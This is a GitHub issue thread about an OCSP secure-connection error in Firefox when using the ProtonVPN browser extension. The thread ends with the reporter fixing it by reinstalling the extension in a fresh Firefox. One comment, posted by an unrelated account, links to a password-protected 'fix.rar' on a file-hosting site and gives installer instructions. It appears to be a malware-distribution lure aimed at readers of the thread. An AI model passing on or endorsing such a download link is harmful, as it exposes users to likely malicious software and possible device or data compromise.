### ISSUE TITLE
OCSP error with ProtonVPN etxension

### ISSUE THREAD

**Issue by I-I-IT** [ProtonVPN/proton-vpn-browser-extension#1]
Please complete the following checklist (by adding [x]):
- [x] I have searched open and closed issues for duplicates
- [x] This isn't a feature request
~[ ] This is not a report about my app not working as expected~*

----------------------------------------

When using the ProtonVPN addon, I get this error : 
> Secure Connection Failed
An error occurred during a connection to search.brave.com. The OCSP server experienced an internal error.
Error code: **SEC_ERROR_OCSP_SERVER_ERROR**
The page you are trying to view cannot be shown because the authenticity of the received data could not be verified.
Please contact the website owners to inform them of this problem.

I don't get the error when I disable the add-on and use the Proton VPN app instead. I have the Arkenfox config that enables OCSP checking by default. I enabled the 'soft-fail' option that is supposed to make the connection to the website continue even if the OCSP server is unavailable. That didn’t fix the problem.

As per [Mozilla support page](https://support.mozilla.org/en-US/kb/secure-connection-failed-firefox-did-not-connect?), this can be due to 1) Security software conflict 2) Incorrect system clock.
My date and time are set automatically.

**System info:**
**OS** : Linux **OS version** : Arch Linux, kernel 6.10.5 – Firefox 129.0.2
**Platform**: ProtonVPN for Firefox
**Proton VPN version** : browser-vpn@1.2.2+firefox

*I am aware Proton wants to be contacted privately, however this thread could help other people and contribute to the common knowledge. Please note that I will NOT make any effort to file a support ticket.

**Comment by c0ffincolors** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by kylekatarnls** [comment]
Hello,

It's the first time I hear about this error when using extension. Can you check the addon permissions and see if everything is checked?

**Comment by I-I-IT** [comment]
I reinstalled it in a fresh Firefox, and it now works. Not sure what was causing the problem.

**Comment by kylekatarnls** [comment]
Thank you for letting us know 🙏 

Feel free to come back here if it occurs again.
